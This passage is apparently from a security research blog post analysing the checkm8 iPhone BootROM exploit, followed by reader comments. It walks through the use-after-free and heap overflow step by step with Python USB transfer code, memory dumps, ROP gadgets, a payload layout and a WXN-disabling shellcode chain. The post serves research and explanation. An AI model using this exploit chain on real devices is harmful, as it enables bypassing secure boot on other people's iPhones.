    00000010: 6E 00 63 00 2E 00 D6 D7  D8 D9 DA DB DC DD DE DF  n.c.............
    00000020: E0 E1 E2 E3 E4 E5 E6 E7  E8 E9 EA EB EC ED EE EF  ................
    00000030: F0 F1 F2 F3 F4 F5 F6 F7  F8 F9 FA FB FC FD FE FF  ................
    chunk at 0x9880  // descs[2], Product
    0x80 non-free 0x80 0
    00000000: 3E 03 41 00 70 00 70 00  6C 00 65 00 20 00 4D 00  >.A.p.p.l.e. .M.
    00000010: 6F 00 62 00 69 00 6C 00  65 00 20 00 44 00 65 00  o.b.i.l.e. .D.e.
    00000020: 76 00 69 00 63 00 65 00  20 00 28 00 44 00 46 00  v.i.c.e. .(.D.F.
    00000030: 55 00 20 00 4D 00 6F 00  64 00 65 00 29 00 FE FF  U. .M.o.d.e.)...
    chunk at 0x9900  // descs[3], Serial number
    0x140 non-free 0x80 0
    00000000: C6 03 43 00 50 00 49 00  44 00 3A 00 38 00 30 00  ..C.P.I.D.:.8.0.
    00000010: 31 00 30 00 20 00 43 00  50 00 52 00 56 00 3A 00  1.0. .C.P.R.V.:.
    00000020: 31 00 31 00 20 00 43 00  50 00 46 00 4D 00 3A 00  1.1. .C.P.F.M.:.
    00000030: 30 00 33 00 20 00 53 00  43 00 45 00 50 00 3A 00  0.3. .S.C.E.P.:.
    00000040: 30 00 31 00 20 00 42 00  44 00 49 00 44 00 3A 00  0.1. .B.D.I.D.:.
    00000050: 30 00 43 00 20 00 45 00  43 00 49 00 44 00 3A 00  0.C. .E.C.I.D.:.
    00000060: 30 00 30 00 31 00 41 00  34 00 30 00 33 00 36 00  0.0.1.A.4.0.3.6.
    00000070: 32 00 30 00 34 00 35 00  45 00 35 00 32 00 36 00  2.0.4.5.E.5.2.6.
    00000080: 20 00 49 00 42 00 46 00  4C 00 3A 00 33 00 43 00   .I.B.F.L.:.3.C.
    00000090: 20 00 53 00 52 00 54 00  47 00 3A 00 5B 00 69 00   .S.R.T.G.:.[.i.
    000000A0: 42 00 6F 00 6F 00 74 00  2D 00 32 00 36 00 39 00  B.o.o.t.-.2.6.9.
    000000B0: 36 00 2E 00 30 00 2E 00  30 00 2E 00 31 00 2E 00  6...0...0...1...
    chunk at 0x9a40  // zlps[0]
    0x80 non-free 0x140 0
    00000000: 80 00 00 00 00 00 00 00  00 89 08 80 01 00 00 00  ................
    00000010: FF FF FF FF 00 00 00 00  00 00 00 00 00 00 00 00  ................
    00000020: 00 00 00 00 00 00 00 00  40 96 1B 80 01 00 00 00  ........@.......
    00000030: F0 F1 F2 F3 F4 F5 F6 F7  F8 F9 FA FB FC FD FE FF  ................
    chunk at 0x9ac0
    0x46540 free 0x80 0
    00000000: 00 00 00 00 00 00 00 00  F8 8F 08 80 01 00 00 00  ................
    00000010: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
    00000020: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
    00000030: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
    00000040: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
    00000050: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
    00000060: 00 00 00 00 00 00 00 00  01 00 00 00 00 00 00 00  ................
    00000070: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
    00000080: 00 00 00 00 00 00 00 00  F8 8F 08 80 01 00 00 00  ................
    00000090: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
    000000A0: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
    000000B0: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................

    You can also achieve an interesting effect by overflowing the configuration descriptors High Speed and Full Speed that are located right after the IO buffer. One of the fields of a configuration descriptor is responsible for its overall length. By overflowing this field, we can read beyond the descriptor. You can try and do it yourself by modifying the exploit.


    2. Allocation and freeing of the IO buffer without clearing the global state


    device = dfu.acquire_device()
    device.serial_number
    libusb1_async_ctrl_transfer(device, 0x21, 1, 0, 0, 'A' * 0x800, 0.0001)
    libusb1_no_error_ctrl_transfer(device, 0x21, 4, 0, 0, 0, 0)
    dfu.release_device(device)

    At this stage, an incomplete OUT request for uploading the image is created. At the same time, a global state is initialized, and the address of the buffer in the heap is written to the io_buffer. Then, DFU is reset with a DFU_CLR_STATUS request, and a new iteration of DFU begins.


    3. Overwriting usb_device_io_request in the heap with use-after-free


    device = dfu.acquire_device()
    device.serial_number
    stall(device)
    leak(device)
    leak(device)
    libusb1_no_error_ctrl_transfer(device, 0, 9, 0, 0, t8010_overwrite, 50)

    At this stage, a usb_device_io_request type object is allocated in the heap, and it is overflown with t8010_overwrite, whose content was defined at the first stage.


    The values of t8010_nop_gadget and 0x1800B0800 should overflow the fields callback and next of the usb_device_io_request structure.


    t8010_nop_gadget is shown below and conforms to its name, but besides function return, the previous LR register is restored, and because of that the call free is skipped after the callback function in usb_core_complete_endpoint_io. This is important, because we damage the heap's metadata due to overflow, which would affect the exploit in case of a freeing attempt.


    bootrom:000000010000CC6C                 LDP             X29, X30, [SP,#0x10+var_s0] // restore fp, lr
    bootrom:000000010000CC70                 LDP             X20, X19, [SP+0x10+var_10],#0x20
    bootrom:000000010000CC74                 RET

    next points to INSECURE_MEMORY + 0x800. Later, INSECURE_MEMORY will store the exploit's payload, and at the offset of 0x800 in the payload, there is a callback-chain, which we'll discuss later on.


    4. Placing the payload


    for i in range(0, len(payload), 0x800):
        libusb1_no_error_ctrl_transfer(device, 0x21, 1, 0, 0,
                                       payload[i:i+0x800], 50)

    At this stage, every following packet is put into the memory area allocated for the image. The payload looks like this:


    0x1800B0000: t8010_shellcode  # initializing shell-code
    ...
    0x1800B0180: t8010_handler  # new usb request handler
    ...
    0x1800B0400: 0x1000006a5  # fake translation table descriptor
                              # corresponds to SecureROM (0x100000000 -> 0x100000000)
                              # matches the value in the original translation table
    ...
    0x1800B0600: 0x60000180000625  # fake translation table descriptor
                                   # corresponds to SecureRAM (0x180000000 -> 0x180000000)
                                   # matches the value in the original translation table
    0x1800B0608: 0x1800006a5  # fake translation table descriptor
                              # new value translates 0x182000000 into 0x180000000
                              # plus, in this descriptor,there are rights for code execution
    0x1800B0610: disabe_wxn_arm64  # code for disabling WXN
    0x1800B0800: usb_rop_callbacks  # callback-chain

    5. Execution of callback-chain


    dfu.usb_reset(device)
    dfu.release_device(device)

    After USB reset, the loop of canceling incomplete usb_device_io_request in the queue by going through a linked list is started. In the previous stages, we replaced the rest of the queue, which allows us to control the callback chain. To build this chain, we use this gadget:


    bootrom:000000010000CC4C                 LDP             X8, X10, [X0,#0x70] ; X0 - usb_device_io_request pointer; X8 = arg0, X10 = call address
    bootrom:000000010000CC50                 LSL             W2, W2, W9
    bootrom:000000010000CC54                 MOV             X0, X8 ; arg0
    bootrom:000000010000CC58                 BLR             X10 ; call
    bootrom:000000010000CC5C                 CMP             W0, #0
    bootrom:000000010000CC60                 CSEL            W0, W0, W19, LT
    bootrom:000000010000CC64                 B               loc_10000CC6C
    bootrom:000000010000CC68 ; ---------------------------------------------------------------------------
    bootrom:000000010000CC68
    bootrom:000000010000CC68 loc_10000CC68                           ; CODE XREF: sub_10000CC1C+18↑j
    bootrom:000000010000CC68                 MOV             W0, #0
    bootrom:000000010000CC6C
    bootrom:000000010000CC6C loc_10000CC6C                           ; CODE XREF: sub_10000CC1C+48↑j
    bootrom:000000010000CC6C                 LDP             X29, X30, [SP,#0x10+var_s0]
    bootrom:000000010000CC70                 LDP             X20, X19, [SP+0x10+var_10],#0x20
    bootrom:000000010000CC74                 RET

    As you can see, at the offset of 0x70 from the pointer to the structure, the call's address and its first argument are loaded. With this gadget, we can easily make any f(x) type calls for arbitrary f and x.


    The entire call chain can be easily emulated with Unicorn Engine. We did it with our modified version of the plugin uEmu.



    The results of the entire chain for iPhone 7 can be found below.


    5.1. dc_civac 0x1800B0600


    000000010000046C: SYS #3, c7, c14, #1, X0
    0000000100000470: RET

    Clearing and invalidating the processor's cache at a virtual address. This will make the processor address our payload later.


    5.2. dmb


    0000000100000478: DMB SY
    000000010000047C: RET

    A memory barrier that guarantees the completion of all operations with the memory done before this instruction. Instructions in high-performance processors can be executed in an order different from the programmed one for the purpose of optimization.


    5.3. enter_critical_section()


    Then, interrupts are masked for the atomic execution of further operations.


    5.4. write_ttbr0(0x1800B0000)


    00000001000003E4: MSR #0, c2, c0, #0, X0; [>] TTBR0_EL1 (Translation Table Base Register 0 (EL1))
    00000001000003E8: ISB
    00000001000003EC: RET

    A new value of the table register TTBR0_EL1 is set in 0x1800B0000. It is the address of INSECURE MEMORY where the exploit's payload is stored. As was mentioned before, the translation descriptors are located at certain offsets in the payload:


    ...
    0x1800B0400: 0x1000006a5           0x100000000 -> 0x100000000 (rx)
    ...
    0x1800B0600: 0x60000180000625      0x180000000 -> 0x180000000 (rw)
    0x1800B0608: 0x1800006a5           0x182000000 -> 0x180000000 (rx)
    ...

    5.5. tlbi


    0000000100000434: DSB SY
    0000000100000438: SYS #0, c8, c7, #0
    000000010000043C: DSB SY
    0000000100000440: ISB
    0000000100000444: RET

    The translation table is invalidated in order to translate addresses according to our new translation table.


    5.6. 0x1820B0610 - disable_wxn_arm64


    MOV  X1, #0x180000000
    ADD  X2, X1, #0xA0000
    ADD  X1, X1, #0x625
    STR  X1, [X2,#0x600]
    DMB  SY
    
    MOV  X0, #0x100D
    MSR  SCTLR_EL1, X0
    DSB  SY
    ISB
    
    RET

    WXN (Write permission implies Execute-never) is disabled to allow us execute code in RW memory. The execution of the WXN disabling code is possible due to the modified translation table.


    5.7. write_ttbr0(0x1800A0000)


    00000001000003E4: MSR #0, c2, c0, #0, X0; [>] TTBR0_EL1 (Translation Table Base Register 0 (EL1))
    00000001000003E8: ISB
    00000001000003EC: RET

    The original value of the TTBR0_EL1 translation register is restored. It is necessary for the correct operation of BootROM during the translation of virtual addresses because the data in INSECURE_MEMORY will be overwritten.


    5.8. tlbi


    The translation table is reset again.


    5.9. exit_critical_section()


    Interrupt handling is back to normal.


    5.10. 0x1800B0000


    Control is transferred to the initializing shellcode.


    Thus, the main task of callback-chain is to disable WXN and transfer control to the shellcode in RW memory.


    6. Execution of shellcode


    The shellcode is in src/checkm8_arm64.S and does the following:


    6.1. Overwriting USB configuration descriptors


    In the global memory, two pointers to configuration descriptors usb_core_hs_configuration_descriptor and usb_core_fs_configuration_descriptor located in the heap are stored. In the third stage, these descriptors were damaged. They are necessary for the correct interaction with a USB device, so the shellcode restores them.


    6.2. Changing USBSerialNumber


    A new string descriptor with a serial number is created with a substring " PWND:[checkm8]" added to it. This will help us understand if the exploit was successful.


    6.3. Overwriting the pointer of the USB request handler


    The original pointer to the handler of USB requests to the interface is overwritten by a pointer to a new handler, which will be placed in the memory at the next step.


    6.4. Copying USB request handler into TRAMPOLINE memory area (0x1800AFC00)


    Upon receiving a USB request, the new handler checks the wValue of the request against 0xffff and if they're not equal, it transfers control back to the original handler. If they are equal, various commands can be executed in the new handlers, like memcpy, memset, and exec (calling an arbitrary address with an arbitrary set of arguments).


    Thus, the analysis of the exploit is complete.


    The implementation of the exploit at a lower level of working with USB


    As a bonus and an example of the attack at lower levels, we published a Proof-of-Concept of the checkm8 implementation on Arduino with USB Host Shield. The PoC works only for iPhone 7 but can be easily ported to other devices. When an iPhone 7 in DFU mode is connected to USB Host Shield, all the steps described in this article will be executed, and the device will enter PWND:[checkm8] mode. Then, it can be connected to a PC via USB to work with it using ipwndfu (to dump memory, use crypto keys, etc.). This method is more stable than using asynchronous requests with a minimal timeout because we work directly with the USB controller. We used the USB_Host_Shield_2.0 library. It needs minor modifications; the patch file is also in the repository.



    In place of a conclusion


    Analyzing checkm8 was very interesting. We hope that this article will be useful for the community and will motivate new research in this area. The vulnerability will continue to influence the jailbreak community. A jailbreak based on checkm8 is already being developed — checkra1n, and since the vulnerability is unfixable, it will always work on vulnerable chips (A5 to A11) regardless of the iOS version. Plus, there are many vulnerable devices, like iWatch, Apple TV, etc. We expect more interesting projects for Apple devices to come.


    Besides jailbreak, this vulnerability will also influence the researchers of Apple devices. With checkm8, you can already boot iOS devices in verbose mode, dump SecureROM, or use the GID key to decrypt firmware images. Although, the most interesting application for this exploit would be entering debug mode on vulnerable devices with a special JTAG/SWD cable. Before that, it could only be done with special prototypes that are extremely hard to get or with the help of special services. Thus, with checkm8, Apple research becomes way easier and cheaper.


    References


    1. Jonathan Levin, *OS Internals: iBoot
    2. Apple, iOS Security Guide
    3. littlelailo, apollo.txt
    4. usb.org
    5. USB in a NutShell
    6. ipwndfu
    7. an ipwndfu fork from LinusHenze
    • +22
    • 34.4k
    • 4
    Digital Security
    412.70
    Безопасность как искусство
    Share post

    Comments 4

      +3
      I read the whole content and see the structure that is briefly explained about the unique technologies. I get unique information from your post. Thanks for sharing with us.
        +1
        1) What exactly does the stall do?

        • It seems to prevent the io requests on the execution queue from being completed, providing enough time to add any number of them before the usb bus is reset. This is implied but not said explicitly.
        • How can the USB bus be «stalled» but still receive additional setup packets and data from later USB packets from the host?


        2) It seems you added an extra usb_leak() to the end before sending the overwrite payload. Is there a purpose of the extra send?
        • It seems likely no. If I have interpreted your analysis correctly, there would then be three io_requests on the heap after the io_buffer rather than two in the original checkm8, right? One fo th stall and then two more for the two usb_leak calls.


        Thanks so much for this. Great post. You guys did some excellent work here.
          +1

          Thank you for your reply and good question!


          1) stall is needed to create an incomplete USB transaction. You are right – this is necessary to prevent request completion, as a result of which you can create a request queue. The delay does not matter. Further requests can be executed even with a sufficiently long pause after the stall (for example, 10 seconds). In fact, the USB bus does not go into the STALL state (the STALL handshake packets are not sent, only NACK). At the same time, the controller is working in such a way that it always processes SETUP packets, which is why it is possible to create a request queue.


          2) No additional requests are needed. As it turned out, in the presented version of the exploit, even a single stall request is enough – it will be overwritten with new "callback" and "next" values. Apparently, this is possible because before overflowing while executing the USB_REQ_SET_CONFIGURATION request (libusb1_no_error_ctrl_transfer(device, 0, 9, 0, 0, t8010_overwrite, 50)), another request will be created and it will remain in the heap (see SecureROM sources). It will play the role of a heap barrier and will prevent access to corrupted metadata of an overflowed request during further work with the heap. If you use a request from the original code (libusb1_no_error_ctrl_transfer(device, 0, 0, 0, 0, t8010_overwrite, 50)), then the second request is needed as a heap barrier.

          +1
          Nice work! Thanks for this article, very informative and valuable.

          Only users with full accounts can post comments. Log in, please.